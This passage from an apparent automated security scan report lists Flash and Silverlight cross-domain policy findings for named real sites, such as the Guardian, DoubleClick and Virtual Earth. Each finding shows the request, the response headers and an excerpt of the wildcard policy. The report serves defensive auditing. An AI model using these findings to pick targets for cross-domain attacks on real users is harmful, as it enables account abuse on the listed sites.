...[SNIP]...
5.57. http://xml.premierleague.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://xml.premierleague.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: xml.premierleague.com

Response

HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Last-Modified: Sun, 02 Oct 2011 23:48:22 GMT
Content-Type: text/xml
Expires: Sun, 02 Oct 2011 23:49:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 02 Oct 2011 23:49:08 GMT
Content-Length: 322
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...
5.58. http://adadvisor.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adadvisor.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adadvisor.net

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:50:19 GMT
Connection: close
Server: AAWebServer
P3P: policyref="http://www.adadvisor.net/w3c/p3p.xml",CP="NOI NID"
Content-Length: 539
Content-Type: Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="
...[SNIP]...
<allow-access-from domain="*.tubemogul.com" />
...[SNIP]...
<allow-access-from domain="*.adap.tv" />
...[SNIP]...
<allow-access-from domain="*.videoegg.com" />
...[SNIP]...
<allow-access-from domain="*.tidaltv.com" />
...[SNIP]...
<allow-access-from domain="*.saymedia.com" />
...[SNIP]...
5.59. http://cookex.amp.yahoo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cookex.amp.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cookex.amp.yahoo.com

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:53:07 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 14 May 2010 21:53:13 GMT
Accept-Ranges: bytes
Content-Length: 1548
Connection: close
Content-Type: application/xml

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
...[SNIP]...
<allow-access-from domain="*.sueddeutsche.de" />
<allow-access-from domain="*.ooyala.com" />
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="*.fwmrm.net" />
<allow-access-from domain="*.auditude.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.mavenapps.net" />
<allow-access-from domain="*.maventechnologies.com" />
<allow-access-from domain="*.grindtv.com" />
<allow-access-from domain="*.vipix.com" />
<allow-access-from domain="*.maven.net" />
<allow-access-from domain="*.mlb.com" />
<allow-access-from domain="*.broadcast.com" />
<allow-access-from domain="*.comcast.net" />
<allow-access-from domain="*.comcastonline.com" />
<allow-access-from domain="*.flickr.com" />
<allow-access-from domain="*.hotjobs.com" />
<allow-access-from domain="*.launch.com" />
<allow-access-from domain="*.overture.com" />
<allow-access-from domain="*.rivals.com" />
<allow-access-from domain="*.scrippsnewspapers.com" />
<allow-access-from domain="*.vmixcore.com" />
<allow-access-from domain="*.vmix.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.yahooligans.com" />
<allow-access-from domain="*.yimg.com" />
...[SNIP]...
5.60. http://googleads.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 15 Sep 2011 22:33:08 GMT
Date: Sun, 02 Oct 2011 06:13:55 GMT
Expires: Mon, 03 Oct 2011 06:13:55 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 63427
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...
5.61. http://optimized-by.rubiconproject.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: optimized-by.rubiconproject.com

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:48:53 GMT
Server: RAS/1.3 (Unix)
Last-Modified: Fri, 17 Sep 2010 22:21:19 GMT
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Accept-Ranges: bytes
Content-Length: 223
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.rubiconproject.com" />

...[SNIP]...
5.62. http://resource.guim.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://resource.guim.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: resource.guim.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
X-GU-jas: 57-22127
X-GU-PageRenderer: RawResourcePageRenderer
Content-Language: en-US
Content-Type: application/xml
Content-Length: 695
X-GU-httpd: 57
P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC"
Cache-Control: max-age=8
Date: Sun, 02 Oct 2011 23:50:57 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<!-- why are we doing this? See here: ht
...[SNIP]...
<allow-access-from domain="*.guardian.co.uk"/>
<allow-access-from domain="static.guim.co.uk"/>
<allow-access-from domain="static.guimqa.co.uk"/>
<allow-access-from domain="static.guimcode.co.uk"/>
<allow-access-from domain="*.gnl" />
...[SNIP]...
5.63. http://www.goal.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.goal.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.goal.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Date: Sun, 02 Oct 2011 23:51:59 GMT
Last-Modified: Thu, 17 Dec 2009 17:49:14 GMT
Server: ECS (sjo/5227)
X-Cache: HIT
Content-Length: 410
Connection: close

<?xml version="1.0"?>

<cross-domain-policy>
<allow-access-from domain="celebrations.coca-cola.com" />
<allow-access-from domain="*.celebrations.coca-cola.com" />
<allow-access-from domain="*.fifawc.coke.sapientem.com" />
<allow-access-from domain="*.goal.com" />
<allow-access-from domain="*.partofthegame.tv" />
   <allow-access-from domain="*.partofthegame.demo" />
...[SNIP]...
5.64. http://www.guardian.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.guardian.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.guardian.co.uk

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:50:55 GMT
Server: Apache
Last-Modified: Thu, 01 Apr 2010 16:14:59 GMT
Accept-Ranges: bytes
Content-Length: 1353
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=86400
Expires: Mon, 03 Oct 2011 23:50:55 GMT
X-GU-httpd: 58
P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC"
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<!-- why are we doing this? See here: ht
...[SNIP]...
<allow-access-from domain="*.bs.preview.serving-sys.com"/>
<allow-access-from domain="199.106.209.225"/>
<allow-access-from domain="*.ds.serving-sys.com"/>
<allow-access-from domain="199.106.209.197"/>
<allow-access-from domain="*.bs.serving-sys.com"/>
<allow-access-from domain="80.252.91.41"/>
<allow-access-from domain="*.eyeblasterwiz.com"/>
<allow-access-from domain="199.106.209.196"/>
<allow-access-from domain="*.ebsearch.eyeblasterwiz.com"/>
<allow-access-from domain="62.249.238.93"/>
<allow-access-from domain="*.serving-sys.com"/>
<allow-access-from domain="web2.dreamleague.co.uk"/>
<allow-access-from domain="fantasyfootball.guardian.co.uk"/>
<allow-access-from domain="*.jumpmediagroup.com"/>
<allow-access-from domain="*.brightcove.com"/>
<allow-access-from domain="adimage.guardian.co.uk"/>
<allow-access-from domain="static.guim.co.uk"/>
<allow-access-from domain="*.gnl" />
...[SNIP]...
5.65. http://matcher-cwb.bidder7.mookie1.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://matcher-cwb.bidder7.mookie1.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: matcher-cwb.bidder7.mookie1.com

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:50:16 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sat, 27 Aug 2011 03:06:07 GMT
ETag: "4010201-116-4ab73f16ec5c0"
Accept-Ranges: bytes
Content-Length: 278
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">

...[SNIP]...
<allow-access-from domain="zaptrader.themig.com" />
...[SNIP]...
6. Silverlight cross-domain policy  previous  next
There are 16 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

6.1. http://ad.doubleclick.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 20:54:04 GMT
Date: Sun, 02 Oct 2011 23:51:36 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...
6.2. http://ad4.liverail.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad4.liverail.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad4.liverail.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Date: Sun, 02 Oct 2011 23:51:35 GMT
ETag: "1435256270"
Last-Modified: Mon, 26 Sep 2011 21:54:57 GMT
Server: lighttpd/1.4.29-devel-4:6M
Content-Length: 321
Connection: Close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<grant-to>

...[SNIP]...
6.3. http://ads.pointroll.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 348
Content-Type: text/xml
Last-Modified: Wed, 01 Dec 2010 17:45:39 GMT
Accept-Ranges: bytes
ETag: "80a33917f91cb1:16e0"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Sun, 02 Oct 2011 23:49:38 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*" />
</allow-from>

...[SNIP]...
6.4. http://b.scorecardresearch.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Mon, 03 Oct 2011 23:50:07 GMT
Date: Sun, 02 Oct 2011 23:50:07 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...
6.5. http://beacon.securestudies.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beacon.securestudies.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: beacon.securestudies.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Mon, 03 Oct 2011 23:52:41 GMT
Date: Sun, 02 Oct 2011 23:52:41 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...
6.6. http://dev.virtualearth.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dev.virtualearth.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: dev.virtualearth.net

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Last-Modified: Sun, 18 Sep 2011 00:40:53 GMT
Accept-Ranges: bytes
ETag: "63203e9f9b75cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 01:02:31 GMT
Connection: close
Content-Length: 374

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
<domain uri="http://*"/>
...[SNIP]...
6.7. http://ecn.t0.tiles.virtualearth.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t0.tiles.virtualearth.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ecn.t0.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "92f3dd6d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 458
Age: 1502958
Date: Mon, 03 Oct 2011 01:02:37 GMT
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Expires: Thu, 17 Nov 2011 15:33:18 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
...[SNIP]...
6.8. http://ecn.t1.tiles.virtualearth.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t1.tiles.virtualearth.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ecn.t1.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "92f3dd6d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 458
Age: 1507571
Date: Mon, 03 Oct 2011 01:02:34 GMT
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Expires: Thu, 17 Nov 2011 14:16:23 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
...[SNIP]...
6.9. http://ecn.t2.tiles.virtualearth.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t2.tiles.virtualearth.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ecn.t2.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "92f3dd6d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 458
Age: 1506862
Date: Mon, 03 Oct 2011 01:02:37 GMT
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Expires: Thu, 17 Nov 2011 14:28:14 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
...[SNIP]...
6.10. http://ecn.t3.tiles.virtualearth.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t3.tiles.virtualearth.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ecn.t3.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "92f3dd6d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 458
Age: 1510791
Date: Mon, 03 Oct 2011 01:02:31 GMT
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Expires: Thu, 17 Nov 2011 13:22:40 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
...[SNIP]...
6.11. http://hits.guardian.co.uk/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hits.guardian.co.uk
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: hits.guardian.co.uk

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:51:01 GMT
Server: Omniture DC/2.0.0
xserver: www4
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...
6.12. http://pixel.quantserve.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Mon, 03 Oct 2011 23:48:53 GMT
Content-Type: text/xml
Content-Length: 312
Date: Sun, 02 Oct 2011 23:48:53 GMT
Server: QS

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
   <domain uri="*"/>
</allow-from>
<grant-to>
   <resour
...[SNIP]...
6.13. http://premiumtv.122.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://premiumtv.122.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: premiumtv.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:50:17 GMT
Server: Omniture DC/2.0.0
xserver: www376
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...
6.14. http://s0.2mdn.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 02 Oct 2011 21:13:15 GMT
Expires: Sun, 02 Oct 2011 21:10:22 GMT
X-Content-Type-Options: nosniff
